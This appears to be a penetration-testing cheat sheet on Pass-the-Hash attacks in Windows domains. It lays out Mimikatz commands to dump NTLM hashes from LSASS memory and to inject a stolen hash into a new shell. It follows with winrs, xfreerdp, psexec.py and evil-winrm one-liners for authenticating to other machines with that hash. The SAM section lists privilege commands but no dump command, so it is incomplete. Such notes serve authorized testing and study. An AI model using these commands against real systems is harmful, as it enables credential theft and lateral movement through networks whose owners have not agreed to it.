Pass The Hash
Administrators
The NTLM challenge sent during authentication can be answered by anyone who knows the user's password hash, so we can authenticate without knowing the plaintext password.
Instead of cracking NTLM hashes, if the Windows domain is configured to accept NTLM authentication we can Pass-the-Hash (PTH) and authenticate successfully.
SAM
Stores the hashes of local users on the machine. No domain users' hashes will be available here.
:: Extracting NTLM Hashes from Local SAM
privilege::debug
token::elevate
LSASS
Holds the hashes of local users and of any domain user that has recently logged onto the machine.
:: Extracting NTLM Hashes from LSASS Memory
privilege::debug
token::elevate
sekurlsa::msv
Using the Hashes
We can use the extracted hashes to perform a Pass-the-Hash attack with Mimikatz, which injects an access token for the victim user into a reverse shell or any other command.
If we run whoami in that shell it will still show the original user from before the PTH, but any command run from it will actually use the credentials injected with PTH.
:: Reverts to the previous token
token::revert
:: Pass-the-Hash
sekurlsa::pth /user:USER /domain:TARGET /ntlm:HASH /run:"Command/PAYLOAD To Run"
:: Command Example
/run:"cmd.exe"
Once we have a command prompt with the credentials loaded, we can use winrs to connect to another TARGET on the domain, since the credentials are already injected into our session.
:: The username and password options are not necessary because the credentials are already injected
winrs.exe -r:TARGET cmd
Other Ways of Connecting
We can also use these tools to connect to the target with the hash:
- Remote Desktop (requires Restricted Admin mode on the target)
xfreerdp /v:TARGET /u:DOMAIN\\USERNAME /pth:NTLM_HASH
- PsExec
psexec.py -hashes ":NTLM_HASH" DOMAIN/USER@TARGET
- Evil-WinRM
evil-winrm -i TARGET -u USERNAME -H NTLM_HASH